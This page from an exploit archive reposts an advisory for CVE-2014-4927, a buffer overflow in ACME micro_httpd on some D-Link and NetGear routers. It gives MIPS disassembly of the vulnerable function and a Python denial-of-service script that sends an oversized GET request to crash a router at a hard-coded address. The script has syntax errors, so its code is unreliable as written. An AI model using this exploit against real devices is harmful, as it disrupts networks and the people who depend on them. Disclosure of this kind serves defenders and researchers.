首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ACME micro_httpd - Denial of Service
来源:vfocus.net 作者:Nativ 发布时间:2014-07-21  
"""
# Exploit Title: Buffer Overflow in micro_httpd by ACME
# Date: 4/7/2014
# Exploit Author: Yuval tisf Nativ
# Vendor Homepage: http://www.acme.com/software/micro_httpd/
# Software Link: http://www.acme.com/software/micro_httpd/
# Version: June 2012
# CVE: CVE-2014-4927
# Tested on: D-Link: (DSL2750U, DSL2740U), NetGear: (WGR614, MR-ADSL-DG834)
  
Buffer Overflow in micro_httpd
  
Argument for GET method is vulnerable to a buffer overflow.
Analyzed on:
    D-Link: DSL2750U, DSL2740U,
    NetGear: WGR614, MR-ADSL-DG834
  
ACME Labs offer no version tracking on server versions so version might not
be accurate.
  
Disassmebly in MIPS of vulnerable flow:
sub_4067CC:
  
LOAD:004067CC
LOAD:004067CC       lui     $gp, 0x47
LOAD:004067D0       addiu   $sp, -0xA0
LOAD:004067D4       li      $gp, 0x46B850
LOAD:004067D8       sw      $ra, 0xA0+var_4($sp)
LOAD:004067DC       sw      $s3, 0xA0+var_8($sp)
LOAD:004067E0       sw      $s2, 0xA0+var_C($sp)
LOAD:004067E4       sw      $s1, 0xA0+var_10($sp)
LOAD:004067E8       sw      $s0, 0xA0+var_14($sp)
LOAD:004067EC       sw      $gp, 0xA0+var_88($sp)
LOAD:004067F0       lui     $s0, 0x46
LOAD:004067F4       lw      $v1, dword_464108
LOAD:004067F8       lw      $t9, (off_463B24 - 0x46B850)($gp)
LOAD:004067FC       move    $v0, $a0
LOAD:00406800       sw      $a1, 0xA0+var_90($sp)
LOAD:00406804       move    $s2, $a2
LOAD:00406808       lui     $a1, 0x44
LOAD:0040680C       lui     $a2, 0x44
LOAD:00406810       move    $a0, $v1
LOAD:00406814       la      $a1, aSDS        # "%s %d %s\r\n"
LOAD:00406818       la      $a2, aHttp1_1    # "HTTP/1.1"
LOAD:0040681C       move    $s1, $a3
LOAD:00406820       jalr    $t9
LOAD:00406824       move    $a3, $v0
LOAD:00406828       lw      $gp, 0xA0+var_88($sp)
LOAD:0040682C       lw      $a0, dword_464108
LOAD:00406830       lw      $t9, (off_463B24 - 0x46B850)($gp)
LOAD:00406834       lui     $a2, 0x44
LOAD:00406838       lui     $a1, 0x44
LOAD:0040683C       la      $a2, aMicro_httpd  # "micro_httpd"
LOAD:00406840       jalr    $t9
LOAD:00406844       la      $a1, aServerS    # "Server: %s\r\n"
LOAD:00406848       lw      $gp, 0xA0+var_88($sp)
LOAD:0040684C       lw      $a1, 0x4108($s0)
LOAD:00406850       lw      $t9, (off_463BCC - 0x46B850)($gp)
LOAD:00406854       lui     $a0, 0x44
LOAD:00406858       jalr    $t9
LOAD:0040685C       la      $a0, aCacheControlNo  # "Cache-Control:
no-cache\r\n"
LOAD:00406860       lw      $gp, 0xA0+var_88($sp)
LOAD:00406864       move    $a0, $0
LOAD:00406868       lw      $t9, (off_463CDC - 0x46B850)($gp)
LOAD:0040686C       jalr    $t9
LOAD:00406870       addiu   $s3, $sp, 0xA0+var_7C
LOAD:00406874       lw      $gp, 0xA0+var_88($sp)
LOAD:00406878       addiu   $a0, $sp, 0xA0+var_80
LOAD:0040687C       lw      $t9, (off_463DF4 - 0x46B850)($gp)
LOAD:00406880       jalr    $t9
LOAD:00406884       sw      $v0, 0xA0+var_80($sp)
LOAD:00406888       lw      $gp, 0xA0+var_88($sp)
LOAD:0040688C       lui     $a2, 0x44
  
  
  
Working Exploit for a Denial of Service:
"""
  
#!/bin/python
import socket
import struct
  
# This will crash the router.
# In some devices it takes about 10 minutes until functionality is
restored.
  
buffer = "\x41" * 6000            # Original fuzzing buffer.
host = "10.0.0.138"
  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
  
payload = GET /" + buffer + " HTTP/1.1\r\n"
payload += ("Host: %s \r\n\r\n", % host)
  
s.send(payload)
s.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NTP Amplification Denial Of Se
·OpenVAS Manager 4.0 - Authenti
·Node Browserify 4.2.0 - Remote
·IBM GCM16/32 1.20.0.22575 - Mu
·Boat Browser 8.0 and 8.0.1 - R
·Raritan PowerIQ 4.1.0 - SQL In
·Wordpress WPTouch Authenticate
·MTS MBlaze Ultra Wi-Fi / ZTE A
·Browserify 4.2.0 Remote Comman
·Linux Kernel ptrace/sysret - L
·Oracle VirtualBox Guest Additi
·vBulletin 5.1.2 SQL Injection
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved